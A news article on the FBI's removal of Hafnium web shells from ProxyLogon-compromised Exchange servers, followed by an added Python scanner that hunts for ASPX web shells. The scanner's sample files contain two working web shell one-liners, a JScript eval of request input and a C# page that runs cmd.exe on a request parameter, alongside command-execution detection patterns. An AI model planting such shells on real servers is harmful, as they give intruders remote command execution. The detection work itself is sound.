FBI removes backdoors from hundreds of hacked Microsoft Exchange servers


A court in Houston has granted the FBI the authority to “copy and remove” web shells from hundreds of hacked computers in the United States running Microsoft Exchange software. The US Department of Justice announced the operation on Tuesday, calling it “successful”.

In March 2021, Microsoft disclosed that a new China-backed hacking group, which it dubbed Hafnium, was targeting on-premises Exchange servers using a set of vulnerabilities known as ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065). Chained together, the flaws allow remote code execution by sending specially crafted requests to the Exchange server: CVE-2021-26855 is a server-side request forgery that bypasses authentication, CVE-2021-26857 is an insecure deserialization bug, and CVE-2021-26858 and CVE-2021-27065 are arbitrary file writes that let the attacker drop files into web-accessible directories.

The attackers exploited these vulnerabilities to gain initial access to the target systems and install an ASPX web shell on the compromised servers, which allowed them to steal data and perform additional malicious activities.

Although Microsoft patched the vulnerabilities, installing the patches does not remove web shells that were already dropped on compromised servers. Those shells remained usable after patching, and other hacking groups also began exploiting the same flaws before administrators could update.

“Many infected system owners successfully removed the web shells from thousands of computers. Others appeared unable to do so, and hundreds of such web shells persisted unmitigated. This operation removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks. The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” said the DoJ in a press release.

“This operation was successful in copying and removing those web shells. However, it did not patch any Microsoft Exchange Server zero-day vulnerabilities or search for or remove any additional malware or hacking tools that hacking groups may have placed on victim networks by exploiting the web shells. The Department strongly encourages network defenders to review Microsoft’s remediation guidance and the March 10 Joint Advisory for further guidance on detection and patching,” it added.

Now the FBI is attempting to notify all owners or operators of systems from which it removed web shells.
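The point of the operation is that patching alone leaves previously dropped web shells in place, so a defender has to inspect the web-accessible Exchange directories separately. The script below is an added example of such a hunt; it is not the FBI's tooling or Microsoft's remediation script. The scanned directory names, the indicator patterns (the one-line `eval(Request[...])` shell style seen in ProxyLogon intrusions, plus a few generic command-execution markers) and the sample files are constructed for this example and are assumptions, not indicators taken from the page.

```python
"""Hunt for ASPX web shells left behind on a patched Exchange server.

Added example (not the FBI's tooling or Microsoft's remediation script).
Patching closes ProxyLogon but leaves any already-dropped .aspx file in
place, so the web-accessible directories still have to be inspected.
Directory names, indicator patterns and sample files are constructed
for this demo and are assumptions, not facts from the article.
"""
import hashlib
import os
import re
import tempfile

# Web-served Exchange/IIS directories where dropped shells typically land
# (assumed, relative paths so the demo can run in a scratch directory).
SCAN_DIRS = [
    "FrontEnd/HttpProxy/owa/auth",
    "FrontEnd/HttpProxy/ecp/auth",
    "inetpub/wwwroot/aspnet_client",
]

# Extensions that IIS will execute as server-side code.
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx")

# Illustrative heuristics: a one-line "eval(Request[...])" shell plus
# generic command-execution markers. Tune before using on real hosts.
INDICATORS = {
    "server_side_eval": re.compile(r"eval\s*\(\s*Request", re.IGNORECASE),
    "unsafe_eval": re.compile(r'"unsafe"\s*\)', re.IGNORECASE),
    "process_start": re.compile(r"Process\.Start|cmd\.exe", re.IGNORECASE),
    "reflective_load": re.compile(r"Assembly\.Load", re.IGNORECASE),
}


def classify_content(text):
    """Return the names of the indicator patterns matched in a file body."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root):
    """Walk the scan directories under root and report suspicious script files.

    Each finding records the relative path (the FBI removed shells by their
    unique file path), a SHA-256 of the file for later triage, and the
    matched indicators. The file is only reported, never deleted.
    """
    findings = []
    for sub in SCAN_DIRS:
        base = os.path.join(root, sub)
        if not os.path.isdir(base):
            continue
        for dirpath, _, files in os.walk(base):
            for name in files:
                if not name.lower().endswith(SCRIPT_EXTS):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read()
                hits = classify_content(data.decode("utf-8", errors="replace"))
                if hits:
                    findings.append({
                        "path": os.path.relpath(path, root).replace(os.sep, "/"),
                        "sha256": hashlib.sha256(data).hexdigest(),
                        "indicators": hits,
                    })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree(root):
    """Write constructed sample files: one legitimate page and two shells."""
    samples = {
        # Benign logon page; must not be flagged.
        "FrontEnd/HttpProxy/owa/auth/logon.aspx":
            '<%@ Page Language="C#" %>\n<form id="logonForm" method="post">'
            '<input name="username"/></form>',
        # JScript one-liner shell style seen after ProxyLogon (constructed).
        "FrontEnd/HttpProxy/owa/auth/help.aspx":
            '<script language="JScript" runat="server">'
            'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
        # C# shell that shells out to cmd.exe (constructed).
        "inetpub/wwwroot/aspnet_client/system_web/shell.aspx":
            '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start('
            '"cmd.exe", "/c " + Request["c"]); %>',
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a scratch directory and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], finding["sha256"][:16], finding["indicators"])
```

The scanner deliberately stops at reporting path, hash and matched indicators: as the DoJ notes, deleting a shell says nothing about what else the intruder left behind, so each hit should feed an incident-response triage (timeline from IIS logs, hash lookups, full host review) rather than an automated delete.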
